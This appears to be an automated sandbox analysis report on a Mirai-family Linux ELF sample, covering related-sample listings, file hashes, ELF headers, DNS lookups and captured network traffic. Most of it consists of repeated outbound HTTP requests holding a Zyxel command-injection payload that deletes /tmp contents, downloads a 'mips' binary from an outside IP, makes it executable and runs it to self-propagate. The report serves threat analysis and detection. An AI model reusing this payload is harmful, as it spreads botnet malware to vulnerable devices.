                                        PWvekjrPit.elfGet hashmaliciousUnknownBrowse
                                        • 80.180.241.140
                                        jBYcDlB7fE.elfGet hashmaliciousUnknownBrowse
                                        • 81.74.22.187
                                        XGKnyrSG4E.elfGet hashmaliciousUnknownBrowse
                                        • 95.244.217.253
                                        zPg5m2HGZ5.elfGet hashmaliciousMiraiBrowse
                                        • 88.61.50.220
                                        ci5DCnYEL1.elfGet hashmaliciousMiraiBrowse
                                        • 79.40.124.109
                                        TELEFONICABRASILSABRRrB2CY3rY4.elfGet hashmaliciousMirai, GafgytBrowse
                                        • 187.88.0.211
                                        OHSAeRS5YB.elfGet hashmaliciousMirai, GafgytBrowse
                                        • 177.60.48.33
                                        mRRAsfeaJD.elfGet hashmaliciousUnknownBrowse
                                        • 187.75.224.250
                                        mg7INGUtNT.elfGet hashmaliciousMiraiBrowse
                                        • 201.26.114.184
                                        jBYcDlB7fE.elfGet hashmaliciousUnknownBrowse
                                        • 179.82.246.58
                                        XGKnyrSG4E.elfGet hashmaliciousUnknownBrowse
                                        • 177.119.163.132
                                        UApBQusqHT.elfGet hashmaliciousMiraiBrowse
                                        • 177.198.103.19
                                        8DR3hoWhoa.elfGet hashmaliciousMiraiBrowse
                                        • 177.213.25.86
                                        8g0fGUcWeQ.elfGet hashmaliciousMiraiBrowse
                                        • 189.110.146.165
                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                        • 177.162.157.213
                                        CHINA169-BACKBONECHINAUNICOMChina169BackboneCNRrB2CY3rY4.elfGet hashmaliciousMirai, GafgytBrowse
                                        • 123.128.71.204
                                        cnRFlrBQt2.elfGet hashmaliciousMirai, GafgytBrowse
                                        • 42.7.155.57
                                        OHSAeRS5YB.elfGet hashmaliciousMirai, GafgytBrowse
                                        • 42.232.24.126
                                        D2M15lCoQK.elfGet hashmaliciousMiraiBrowse
                                        • 110.231.71.130
                                        pWf4oPGBv2.elfGet hashmaliciousMiraiBrowse
                                        • 122.137.112.230
                                        7bPP8gHfVN.elfGet hashmaliciousMiraiBrowse
                                        • 125.44.48.15
                                        lu5n6aIYPZ.elfGet hashmaliciousUnknownBrowse
                                        • 221.194.16.239
                                        PWvekjrPit.elfGet hashmaliciousUnknownBrowse
                                        • 1.189.204.105
                                        mRRAsfeaJD.elfGet hashmaliciousUnknownBrowse
                                        • 42.59.72.211
                                        mg7INGUtNT.elfGet hashmaliciousMiraiBrowse
                                        • 124.130.19.187
                                        BOSNET-AS-APOfficeoftheBoardofStudiesAUAX3m0ijP4L.elfGet hashmaliciousMoobotBrowse
                                        • 202.47.85.78
                                        JKfLgrv17o.elfGet hashmaliciousMiraiBrowse
                                        • 202.47.85.92
                                        arm.elfGet hashmaliciousUnknownBrowse
                                        • 202.47.85.57
                                        ilZqTcGlNz.elfGet hashmaliciousMiraiBrowse
                                        • 202.47.85.90
                                        MYmnoEhahZ.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 202.47.85.61
                                        QWfq1zRgch.elfGet hashmaliciousMiraiBrowse
                                        • 202.47.85.86
                                        REdvyzgp3j.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 202.47.85.70
                                        UYRnKOA2eX.elfGet hashmaliciousMiraiBrowse
                                        • 202.47.85.55
                                        0kjEYzApPY.elfGet hashmaliciousMiraiBrowse
                                        • 202.47.85.57
                                        X6U2at7z1Q.elfGet hashmaliciousMiraiBrowse
                                        • 202.47.85.65
                                        No context
                                        No context
                                        No created / dropped files found
                                        File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                        Entropy (8bit):6.023863901307569
                                        TrID:
                                        • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                        • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                        File name:QvyiI8SFTm.elf
                                        File size:123'660 bytes
                                        MD5:674d0a7fdcd07d7496e25f39b4bad83b
                                        SHA1:88e2bf775d83fd8d9b0a0c7e76369bba22af513b
                                        SHA256:5d352899a059337123d961aeed9a7942d3bdb977cff35765d16754f9cc3ffeb3
                                        SHA512:48db14eafd9f4def03d732f65f29a45e0b3de786fa4d0fd3633c3b1907428aae2033ae61952e924cd5f9f5cff5c11f3c6094565d52470e410a9ac4605a07467c
                                        SSDEEP:3072:MopX/y7dqAb9bbok5RkzL27S9mZ3T5CZpHWGc3R3mA:MopX/y7dZb9bB5izI3lCn2GcBm
                                        TLSH:16C38ED9E183D4F3E85B04B4603AEB3B9E72D47A211AFA85D729CD32F8D25809117A5C
                                        File Content Preview:.ELF....................d...4...|.......4. ...(..............................................)...)...G..............Q.td............................U..S............h.....^..[]...$.............U......=@q...t..5.....)......)......u........t....h............

                                        ELF header

                                        Class:ELF32
                                        Data:2's complement, little endian
                                        Version:1 (current)
                                        Machine:Intel 80386
                                        Version Number:0x1
                                        Type:EXEC (Executable file)
                                        OS/ABI:UNIX - System V
                                        ABI Version:0
                                        Entry Point Address:0x8048164
                                        Flags:0x0
                                        ELF Header Size:52
                                        Program Header Offset:52
                                        Program Header Size:32
                                        Number of Program Headers:3
                                        Section Header Offset:123260
                                        Section Header Size:40
                                        Number of Section Headers:10
                                        Header String Table Index:9
                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                        NULL0x00x00x00x00x0000
                                        .initPROGBITS0x80480940x940x1c0x00x6AX001
                                        .textPROGBITS0x80480b00xb00x15f060x00x6AX0016
                                        .finiPROGBITS0x805dfb60x15fb60x170x00x6AX001
                                        .rodataPROGBITS0x805dfe00x15fe00x39c00x00x2A0032
                                        .ctorsPROGBITS0x80629a40x199a40xc0x00x3WA004
                                        .dtorsPROGBITS0x80629b00x199b00x80x00x3WA004
                                        .dataPROGBITS0x80629e00x199e00x475c0x00x3WA0032
                                        .bssNOBITS0x80671400x1e13c0x494c0x00x3WA0032
                                        .shstrtabSTRTAB0x00x1e13c0x3e0x00x0001
                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                        LOAD0x00x80480000x80480000x199a00x199a06.63930x5R E0x1000.init .text .fini .rodata
                                        LOAD0x199a40x80629a40x80629a40x47980x90e80.35730x6RW 0x1000.ctors .dtors .data .bss
                                        GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Mar 31, 2024 09:20:07.162785053 CEST192.168.2.238.8.8.80x1d71Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                                        Mar 31, 2024 09:20:10.734783888 CEST192.168.2.238.8.8.80x5375Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                                        Mar 31, 2024 09:20:12.250015974 CEST192.168.2.238.8.8.80xc05Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                                        Mar 31, 2024 09:20:18.755599022 CEST192.168.2.238.8.8.80xc129Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                                        Mar 31, 2024 09:20:28.255968094 CEST192.168.2.238.8.8.80x8d4bStandard query (0)a.iruko.topA (IP address)IN (0x0001)false
                                        Mar 31, 2024 09:20:38.758189917 CEST192.168.2.238.8.8.80x4681Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                                        Mar 31, 2024 09:20:46.285990953 CEST192.168.2.238.8.8.80x194Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                                        Mar 31, 2024 09:20:50.809654951 CEST192.168.2.238.8.8.80x85c4Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Mar 31, 2024 09:20:07.271147013 CEST8.8.8.8192.168.2.230x1d71No error (0)a.iruko.top45.152.86.86A (IP address)IN (0x0001)false
                                        Mar 31, 2024 09:20:10.840931892 CEST8.8.8.8192.168.2.230x5375No error (0)a.iruko.top45.152.86.86A (IP address)IN (0x0001)false
                                        Mar 31, 2024 09:20:12.355566025 CEST8.8.8.8192.168.2.230xc05No error (0)a.iruko.top45.152.86.86A (IP address)IN (0x0001)false
                                        Mar 31, 2024 09:20:18.861396074 CEST8.8.8.8192.168.2.230xc129No error (0)a.iruko.top45.152.86.86A (IP address)IN (0x0001)false
                                        Mar 31, 2024 09:20:28.361735106 CEST8.8.8.8192.168.2.230x8d4bNo error (0)a.iruko.top45.152.86.86A (IP address)IN (0x0001)false
                                        Mar 31, 2024 09:20:38.864528894 CEST8.8.8.8192.168.2.230x4681No error (0)a.iruko.top45.152.86.86A (IP address)IN (0x0001)false
                                        Mar 31, 2024 09:20:46.392348051 CEST8.8.8.8192.168.2.230x194No error (0)a.iruko.top45.152.86.86A (IP address)IN (0x0001)false
                                        Mar 31, 2024 09:20:50.915107012 CEST8.8.8.8192.168.2.230x85c4No error (0)a.iruko.top45.152.86.86A (IP address)IN (0x0001)false
                                        Session IDSource IPSource PortDestination IPDestination Port
                                        0192.168.2.235159448.116.63.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:08.542464972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1192.168.2.2340154212.141.104.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:08.569447994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2192.168.2.2344106111.207.28.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:08.596436024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3192.168.2.2346508202.117.66.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:08.622863054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4192.168.2.234762832.55.174.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:08.649324894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5192.168.2.2338952138.62.231.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:08.677216053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6192.168.2.2358506172.223.146.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:08.704790115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7192.168.2.235062674.226.211.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:08.731601000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8192.168.2.235494027.87.217.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:08.757613897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9192.168.2.234927249.169.252.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:08.785108089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10192.168.2.2352874199.113.190.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:08.813750982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11192.168.2.2337008195.240.133.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:08.841315031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12192.168.2.2350438121.39.232.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:08.866945028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13192.168.2.234803889.115.96.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:08.892904043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14192.168.2.2336126111.183.146.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:08.920003891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15192.168.2.2360068177.189.242.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:09.558357954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16192.168.2.2341136199.87.30.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:09.590738058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17192.168.2.2336026100.167.91.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:09.626398087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18192.168.2.2357140122.3.4.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:09.861561060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19192.168.2.2346248205.106.33.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:09.892843008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20192.168.2.234047243.140.76.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:09.965507984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21192.168.2.234979214.219.36.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:10.040225029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22192.168.2.2343590143.138.109.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:10.040306091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23192.168.2.2360900177.155.188.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:10.040347099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24192.168.2.235176699.208.232.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:10.040430069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25192.168.2.2337908199.117.212.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:10.040556908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        26192.168.2.2345324194.163.199.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:10.040585995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        27192.168.2.234553642.245.154.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:10.040749073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        28192.168.2.2346578185.49.239.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:10.040775061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        29192.168.2.235894050.182.217.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:10.040833950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        30192.168.2.2356846118.227.179.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:11.044190884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        31192.168.2.235946463.218.35.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:11.044246912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        32192.168.2.2355686221.172.172.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:11.044287920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        33192.168.2.234843879.110.140.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:11.044322968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        34192.168.2.2336412194.138.183.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:11.044509888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        35192.168.2.235475254.212.139.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:12.047374010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        36192.168.2.2346088216.221.204.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:12.047437906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        37192.168.2.2337626197.18.165.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:12.047494888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        38192.168.2.235691063.145.116.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:13.050266981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        39192.168.2.2348676166.221.63.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:13.050333977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        40192.168.2.233605071.3.112.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:13.050393105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        41192.168.2.235332690.46.69.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:13.050571918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        42192.168.2.2340334154.197.207.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:13.050621033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        43192.168.2.233497476.32.93.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:14.055124998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        44192.168.2.235006439.55.129.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:14.055294037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        45192.168.2.234390447.226.96.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:14.055340052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        46192.168.2.234378688.1.148.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:15.059382915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        47192.168.2.2359286114.146.127.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:15.059457064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
